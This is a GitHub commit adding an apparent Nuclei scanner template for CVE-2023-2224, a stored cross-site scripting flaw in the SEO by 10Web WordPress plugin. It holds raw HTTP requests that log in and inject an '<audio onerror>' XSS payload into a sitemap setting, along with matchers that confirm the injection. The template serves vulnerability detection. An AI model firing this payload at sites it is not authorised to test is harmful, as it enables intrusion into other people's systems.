Create CVE-2023-2224.yaml

patch-1
Luis Felipe 2023-10-02 08:57:09 -03:00 committed by GitHub
parent 29d3f2c5ce
commit 63dcb68b75
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 51 additions and 0 deletions

View File

@ -0,0 +1,51 @@
id: CVE-2023-2224
info:
name: Seo By 10Web < 1.2.7 - Admin+ Stored XSS
author: luisfelipe146
severity: medium
description: |
The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
reference:
- https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992
- https://nvd.nist.gov/vuln/detail/CVE-2023-2224
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2224
- https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html
classification:
cve-id: CVE-2023-2224
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=1 HTTP/1.1
Host: {{Hostname}}
task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28%22XSS%22%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo=b16eae563d&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "value=\"\"><audio src=x onerror=confirm(\"XSS\")>\""
- type: word
part: header
words:
- text/html
- type: status
status:
- 200